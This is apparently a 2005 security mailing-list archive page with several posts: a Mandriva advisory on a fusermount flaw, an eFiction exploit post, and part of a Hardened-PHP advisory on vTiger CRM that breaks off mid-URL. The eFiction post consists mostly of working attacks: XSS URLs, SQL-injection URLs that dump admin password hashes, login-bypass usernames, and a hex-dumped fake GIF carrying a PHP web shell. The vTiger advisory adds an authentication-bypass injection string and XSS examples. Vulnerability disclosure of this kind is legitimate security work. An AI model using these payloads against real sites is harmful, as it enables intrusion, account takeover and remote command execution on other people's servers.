MDKSA-2005:216 - Updated fuse packages fix vulnerability

2005-11-25 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:216
 http://www.mandriva.com/security/
 ___
 
 Package : fuse
 Date: November 24, 2005
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Thomas Beige found that fusermount failed to securely handle special
 characters specified in mount points, which could allow a local
 attacker to corrupt the contents of /etc/mtab by mounting over a
 maliciously-named directory using fusermount.  This could potentially
 allow the attacker to set unauthorized mount options.
 
 This is only possible when fusermount is installed setuid root, which
 is the case in Mandriva Linux.
 
 The updated packages have been patched to address these problems.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3531
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 a3ae4ac8ed8a96214bbe1801722fd68e  
2006.0/RPMS/dkms-fuse-2.3.0-2.1.20060mdk.i586.rpm
 7703d6d4e053663bfa3712a6302c07be  2006.0/RPMS/fuse-2.3.0-2.1.20060mdk.i586.rpm
 4daead454fd46fb8ea95953d9a1d3b12  
2006.0/RPMS/libfuse2-2.3.0-2.1.20060mdk.i586.rpm
 db457d4c29b4d8d19d34434086e12fc7  
2006.0/RPMS/libfuse2-devel-2.3.0-2.1.20060mdk.i586.rpm
 86880673c11a93aa8a9001d79416f962  
2006.0/RPMS/libfuse2-static-devel-2.3.0-2.1.20060mdk.i586.rpm
 88ec22000581f550f0f2c11f29e70b0c  2006.0/SRPMS/fuse-2.3.0-2.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 c94bfcb85845fd023fd2edfe88af55a4  
x86_64/2006.0/RPMS/dkms-fuse-2.3.0-2.1.20060mdk.x86_64.rpm
 bbbfc58364a1ceaeb363428e1cd9423c  
x86_64/2006.0/RPMS/fuse-2.3.0-2.1.20060mdk.x86_64.rpm
 5b0cd9cef709bfcf624b35880c5fab46  
x86_64/2006.0/RPMS/lib64fuse2-2.3.0-2.1.20060mdk.x86_64.rpm
 80ba54b4cb2467f9d2045114fa859873  
x86_64/2006.0/RPMS/lib64fuse2-devel-2.3.0-2.1.20060mdk.x86_64.rpm
 8aa436b1cb28f893fd68ba2fa53ae76e  
x86_64/2006.0/RPMS/lib64fuse2-static-devel-2.3.0-2.1.20060mdk.x86_64.rpm
 88ec22000581f550f0f2c11f29e70b0c  
x86_64/2006.0/SRPMS/fuse-2.3.0-2.1.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDhgLfmqjQ0CJFipgRAgZMAKCoUKqr+XKmjG91tB9as/8jQjIO5wCg7pCN
k7oCnFekKIWVLBUz0x1ff+Q=
=X3aa
-END PGP SIGNATURE-


eFiction = 2.0 multiple vulnerabilities

2005-11-25 Thread retrogod
efiction = 2.0 remote code execution / SQL injection / login bypass / cross 
site scripting / path  information disclosure

software:
site: http://www.efiction.wallflowergirl.com/index.php
description: Efiction is a software program that enables users to run 
automated original or fanfiction
archives on their websites. The program is PHP and MySQL database driven and is 
released as open-source software.


i)
xss:
efiction 1.0/1.1:
http://[target]/efiction/titles.php?action=viewlistlet=scriptalert(document.cookie)/script
on version 2.0, thorugh sql injection:
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,'scriptalert(document.cookie)/script',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

ii)
if magic_quotes_gpc off - SQL INJECTION:
you can see at screen any admin/user MD5 password hash

efiction 1.0:
http://[target]/[path]/authors.php?action=viewlistlet='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
http://[target]/[path]/authors.php?action=viewlistlet=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*offset=0,40/*
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

efiction 1.1:
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/*

efiction 2.0
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

iii)
if magic_quotes_gpc off - Login bypass:
you can login as admin typing:

efiction 1.0:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM 
fanfiction_authors where level=1/*
password: [nothing]

efiction 1.1:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories 
FROM fanfiction_authors where level=1/*
password: [nothing]

efiction 2.0:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent
 FROM fanfiction_authors where level=1/*
password: [nothing]   ^
  |
  |
 this is the hash of [nothing]

iv)

remote code execution (1.0/1.1/2.0):

register, a temporary password will be sent to you by email, login, goto 
Manage Images
(or go to http://target/path/user.php?action=manageimagesupload=upload), 
choose Upload new image, upload a fake gif cmd.php
like this (this is the hexadecimal dump):

:47 49 46 38 39 61 01 00 01 00 f7 00 00 a4 b6 a4GIF89a÷..¤¶¤
0010:16 00 00 f4 00 00 77 00 00 6b 00 4c 15 00 00 f4...ô..w..k.L...ô
0020:00 69 77 00 00 f8 00 6e 62 00 00 15 00 67 00 00.iw..ø.nbg..
0030:00 34 00 75 00 00 00 00 00 61 c0 00 00 00 00 00.4.u.aÀ.
0040:00 00 00 00 00 00 00 00 00 89 00 00 1c 00 00 00.‰..
0050:00 00 00 00 00 a9 00 00 20 00 00 00 00 00 00 00.©.. ...
0060:00 6f 00 00 00 00 00 00 00 00 00 00 00 56 00 00.o...V..
0070:00 00 00 3c 3f 70 68 70 20 65 72 72 6f 72 5f 72...?php error_r
0080:65 70 6f 72 74 69 6e 67 28 30 29 3b 69 6e 69 5feporting(0);ini_
0090:73 65 74 28 22 6d 61 78 5f 65 78 65 63 75 74 69set(max_executi
00a0:6f 6e 5f 74 69 6d 65 22 2c 30 29 3b 73 79 73 74on_time,0);syst
00b0:65 6d 28 24 5f 47 45 54 5b 63 6d 64 5d 29 3b 3fem($_GET[cmd]);?
00c0:3e 38 00 00 e5 00 00 

Mandriva Security

2005-11-25 Thread [at]
does anybody know how to contact Mandriva Security?
I drop three security contact messages to [EMAIL PROTECTED] , but all no 
response ... :(



Re: Advisory 23/2005: vTiger multiple vulnerabilities

2005-11-25 Thread Christopher Kunz
Hello,

Here, too:

one quick fix:
-3. Turn magic_quotes_gpc off.
+3. Turn magic_quotes_gpc on.

Regards,

--ck


Advisory 23/2005: vTiger multiple vulnerabilities

2005-11-25 Thread Christopher Kunz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hardened PHP Project
www.hardened-php.net

  -= Security  Advisory =-


 Advisory: Multiple vulnerabilities in vTiger CRM
 Release Date: 2005/11/24
Last Modified: 2005/11/24
   Author: Christopher Kunz [EMAIL PROTECTED]
  Application: vTiger 4.2 and prior
 Severity: Cross-Site Scripting, SQL injection and information
   disclosure, password hash disclosure, authentication bypass,
   local file disclosure, remote code execution
 Risk: High / Critical (depending on server configuration)
Vendor Status: Vendor informed. No fix available.
   References: http://www.hardened-php.net/advisory_232005.105.html


Overview:

   vtiger [1] is an open source customer relationship management system (CRM)
   which is maintained by an indian company with the same name. It has been
   forked off the SugarCRM project [2] in an earlier stage, thus a number of
   issues reported by GulfTech Security in [3] are also present in vtiger. An
   additional layer of insecurity has obviously been introduced by the devel-
   opers, enabling malicious users to log in to the CRM without any creden-
   tials whatsoever and execute remote code.


Details:

   1) XSS issues-a-plenty
  As James Bercegay reported, there is an abundance of XSS problems all
  over the CRM, with only a few examples being the following:
  - a malicious local user could create a contact, lead, account, poten-
tial or other data set that includes script code in any field. Typi-
cal fields would be first or last name, but nearly every other field
is possible, too. Then, the malicious user could send the link to
that contact to the administrator - and have the script code do what-
ever DOM operation is necessary to elevate privileges.
  - Even easier and without any inside knowledge needed:
/index.php?action=DetailViewmodule=Leadsrecord=%3Cscript%3Ealert
('document.cookie')%3C/script%3E (as reported by James).
  - Since the variable $_SERVER['PHP_SELF'] is used for most form actions,
and also for creating internal links, the string scriptalert('xss')
/script can be used to create a path-info XSS that exploits any
logged-in user. The URI parameters are irrelevant and have been
ommitted to keep the example clean.
Example:
/index.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E/?[params]

   2) Remote XSS in RSS
  vtiger features a comprehensive RSS aggregation module, allowing users
  to read all their favorite blogs, news sites or other feeds from within
  the CRM. However, no input checking is performed before aggregated feeds
  are sent to the client. A malicious blog, news site or other feed could
  socially engineer a user into aggregating it and then use script code to
  elevate their privileges via DOM.
  We are featuring this as a different attack class since the vector does
  not require the CRM user to click on any links - being subscribed to an
  seemingly interesting blog is enough to fall victim to this attack.

   3) Authentication Bypass
  If the php.ini setting magic_quotes_gpc is set to Off, which is the
  setting provided in php.ini-recommended, an attacker can bypass the
  authentication process completely, by entering a fabricated user name.
  Since the login form is prone to SQL injection (like any other form),
  a username like foo' or '%'=' leads to the following SQL statement:
  SELECT*
  FROM  users
  WHERE user_name='admin'
  OR'%'='%'
  AND   user_password='adAZ2jidC3H1M'
  This query returns 1 row with the administrator's credentials. This re-
  sult set is used to determine that authentication was successful.
  The attacker is now logged into the CRM system as the administrator and
  can perform tasks like uploading the whole CRM instance to a remote sys-
  tem, display system information - and of course mess around with the
  customer data.

   4) User credential disclosure via SQL Injection
  Again, if magic_quotes_gpc is Off, a logged-in user can manipulate many
  form fields into displaying arbitrary values, including user names and
  passwords. Again, similar issues were reported by GulfTech - we have
  found some more injection vulnerabilities like this one:
  /?ticket_title=contact_name=priority=status=action=indexquery=truem
  odule=HelpDeskorder_by=sorder=ASCviewname=0button=Searchcategory=da
  te_crit=isdate=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+
  user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1